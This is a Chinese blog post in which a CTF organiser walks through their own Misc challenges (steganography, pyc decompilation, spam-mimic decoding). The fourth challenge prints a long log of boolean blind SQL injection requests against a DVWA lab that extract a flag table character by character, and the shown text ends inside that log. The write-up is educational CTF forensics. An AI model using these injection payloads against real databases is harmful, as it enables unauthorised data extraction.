写在前面
很多是工具题,也比较综合和杂,仅以本篇博客记录自己杂项(Misc)出题的奇思妙想。
Copyright © [2024] [Myon⁶]. All rights reserved.
题目源文件地址:
https://github.com/Myon5/Myon-Mischttps://github.com/Myon5/Myon-Misc
目录
1、勇师傅送分题你们就偷着乐吧
这个真是送分题
存在文件隐藏
直接分离后打开 flag.txt
结尾存在 base64 编码,解码即可
得到 flag:flag{swust_snert_swctf}
2、柯柯柯啊
题目附件为两个wav音频和一个txt文本
先看txt,是很长的base64
解码一下,很明显的看到png头
因此将base64转图片,使用在线网站或者工具都是可以的
这里我们直接将结果保存为png后缀
查看图片,似乎看起来并不完整
我们爆破一下CRC以及正确的宽和高
得到修复之后的图片
打开即可得到密码:That's terrible.
目前还不知道用处,先留着后面肯定用得到。
接下来我们看两段音频
joker1的话是一段很短的杂音,joker2是一段歌曲
CTF里对音频分析常用的工具:RX-SSTV、DeepSound、Audacity
这里并没有听到无线电,因此排除 RX-SSTV
经过简单尝试可以发现:
使用Audacity打开 joker1.wav
查看频谱图可以得到前半段flag:flag{1S_it_JUst_me_
使用DeepSound打开 joker2.wav 提示需要密码,正好使用我们之前从图片上得到的密码
即:That's terrible.
输入密码后可以看到有隐藏flag2.txt
分离即可
打开得到第二段flag:0R_is_iT_Getting_crAzier_0Utthere}
拼接起来,最终flag为:flag{1S_it_JUst_me_0R_is_iT_Getting_crAzier_0Utthere}
3、The Clown's Gift
题目附件为pyc、jpg、txt文件
pyc文件是看不出什么的,拿到pyc一般我们是需要转成py文件的,也就是pyc的反编译
在线网站可以
反编译后复制有用代码即可
pycharm的uncompyle6也可以实现(需要安装该模块)
在终端执行如下命令
dc.pyc是源文件,dc.py是反编译生成的文件(大于符号左右都需要有空格)
uncompyle6.exe dc.pyc > dc.py
执行成功后得到dc.py
注意:这种反编译出来的py文件可能会存在一些格式问题无法直接运行
需要将代码重新复制到一个新建的py文件即可正常运行
具体参考我前面的博客:SyntaxError: Non-UTF-8 code starting with ‘\xff‘ in file but no encoding declared 解决办法与分析
看起来像一个解密脚本:
将一个字符串按照空格分割成一个列表,并使用该列表中的元素来映射一个包含字母的二维列表(就是键盘对应的字母),最终输出对应的字母组成的字符串。
a = ''.split(' ')
key_list = [['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p'],
[
'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'],
[
'z', 'x', 'c', 'v', 'b', 'n', 'm']]
print(a)
for index in a:
for i, key_lists in enumerate(key_list):
for i2, key in enumerate(key_lists):
if str(i + 1) + str(i2 + 1) == index:
print(key, end='')
但是我们现在还没有密文,因此先放着,看其他附件
打开secret.txt,是一封写得很啰嗦的邮件
当然如果你刷题遇到过知道这个东西,这个就是垃圾邮件加密
你也可以去检索邮件内容并结合CTF等关键字
你会找到一个网站:https://www.spammimic.com/
这是一个解码垃圾邮件的,我们直接解码即可
得到一串空格分隔的数字:18 15 18 22 36 19 15 21 27 19 28 13
结合刚才的解密脚本直接跑
将a赋值好刚才得到的数字:18 15 18 22 36 19 15 21 27 19 28 13
运行得到:itisnotajoke
应该是一个密码,留着后面用
现在附件只剩下 joker.jpg
一系列的图片分析命令使用后并没有发现什么
使用010editor打开,拉到结尾,发现是很常见的文件尾藏信息
很显眼的 50 4B 压缩包头,只是取了倒序
由于jpg存在高亮,因此结束位置也很明确
我们直接提取hex值
太长了我这里就不打出来了,从00 00 00 10 一直到结尾的 B4 05
运行上述取倒序的脚本得到 50 4B 开头的hex值
新建十六进制文件
导入取倒序后的hex值,注意使用Ctrl+shift+V
因为 50 4B 是压缩包头,因此我们另存为zip文件
打开发现需要密码
使用前面得到的密码:itisnotajoke 解压
得到另一张joker的图片和一个pass.txt文档
经检测发现 pass.txt 存在零宽隐写
得到 pass:"if we could be whoever we want, would the cloud love us like they hug the stars?"
应该是一串很长的密码
有一个密码,并且还有一张jpg图片,那么想到jpg的LSB隐写
(png的lsb隐写一般是不需要密码的)
确实存在隐写
我们这里假设提取为一个txt文件(如果不是再做修改)
打开即可看到flag:
flag{Are_y0u_hav1ng_aNy_nEgative_thoUghts}
4、萧总说太明显了
过滤 http 包,可以发现这是一段 sql 盲注的流量
查找关键字 flag 可以找到很多关于 flag 的请求记录
随便找一个进行 URL 解码后就可以看到它的详细查询语句
这里是从 swctf 数据库下的 snert 表下采用盲注的方式查 flag
通过与 ASCII 码进行比较,再结合响应包的状态码是 200 还是 404 来确定 flag 是哪些字符
提取相关请求的 URL,这里我们只需要 info 信息,不用勾选其他的
检索 flag 定位到开始查 flag 的地方
从这个包开始一直到结尾的数据全部复制下来
整体进行 URL 解码
将解码内容存为 txt 文件:
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>106 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>103 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>124 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>122 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>123 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>103 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>66 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>63 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>65 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>99 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>106 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),10,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),11,1))>113 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>84 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>90 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>93 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 200 OK (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
HTTP/1.1 404 Not Found (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1
